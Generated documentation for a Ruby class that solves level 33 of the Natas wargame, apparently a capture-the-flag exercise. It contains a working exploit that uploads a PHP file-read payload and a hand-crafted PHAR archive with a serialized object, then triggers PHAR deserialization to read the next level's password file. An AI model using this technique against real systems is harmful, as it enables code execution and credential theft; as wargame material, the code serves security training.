Class: NatasLevel33

Inherits:
NatasLevelBase show all
Defined in:
lib/natas.rb

Overview

Level 33

Constant Summary collapse

LEVEL = 
33
PAGE = 
'/'
MAX_FILESIZE = 
4096
PAYLOAD_FILENAME = 
'payload.php'
PHAR_FILENAME = 
'payload.phar'
PHARNAME = 
'phar://payload.phar/empty.php'
PAYLOAD = 
%(Password: <?php echo file_get_contents("#{WEBPASS}/natas34"); ?>)

Constants inherited from NatasLevelBase

NatasLevelBase::HOST, NatasLevelBase::LOGIN, NatasLevelBase::PASSWORD_LENGTH, NatasLevelBase::PORT, NatasLevelBase::WEBPASS

Instance Attribute Summary

Attributes inherited from NatasLevelBase

#login, #password

Instance Method Summary collapse

Methods inherited from NatasLevelBase

#get, #initialize, #level, #post

Constructor Details

This class inherits a constructor from NatasLevelBase

Instance Method Details

#execObject 



955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
 
# File 'lib/natas.rb', line 955

def exec
  payload_signature = Digest::MD5.hexdigest(PAYLOAD)
  log("Payload MD5 signature: #{payload_signature}")

  phar_payload = %(<?php __HALT_COMPILER(); ?>\r\n\xD4\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x00\x00\x9D\x00\x00\x00O:8:\"Executor\":3:{s:18:\"\x00Executor\x00filename\";s:#{PAYLOAD_FILENAME.bytesize}:\"#{PAYLOAD_FILENAME}\";s:19:\"\x00Executor\x00signature\";s:#{payload_signature.bytesize}:\"#{payload_signature}\";s:14:\"\x00Executor\x00init\";b:0;}\t\x00\x00\x00empty.php\x00\x00\x00\x00\x8C\x9CSa\x00\x00\x00\x00\x00\x00\x00\x00\xB4\x01\x00\x00\x00\x00\x00\x00).dup
  phar_payload.force_encoding('ascii-8bit')
  phar_signature = Digest::SHA1.digest(phar_payload)
  log("PHAR SHA1 signature: #{phar_signature.unpack1('H*')}")
  phar_payload << phar_signature
  phar_payload << "\x02\x00\x00\x00GBMB"

  log("Uploading file with payload: #{PAYLOAD_FILENAME}")
  data = [
    ['filename', PAYLOAD_FILENAME],
    ['uploadedfile', PAYLOAD, { filename: 'uploadedfile' }]
  ]
  post(PAGE, {}, data, multipart: true)

  log("Uploading file with PHAR payload: #{PHAR_FILENAME}")
  data = [
    ['filename', PHAR_FILENAME],
    ['uploadedfile', phar_payload, { filename: 'uploadedfile' }]
  ]
  post(PAGE, {}, data, multipart: true)

  log("Executing PHAR payload: #{PHARNAME}")
  data = [
    ['filename', PHARNAME],
    ['uploadedfile', "\x00" * (MAX_FILESIZE + 1), { filename: 'uploadedfile' }]
  ]
  data = post(PAGE, {}, data, multipart: true).body

  match = /Password: (\w+)/.match(data)
  not_found unless match
  found(match[1])
end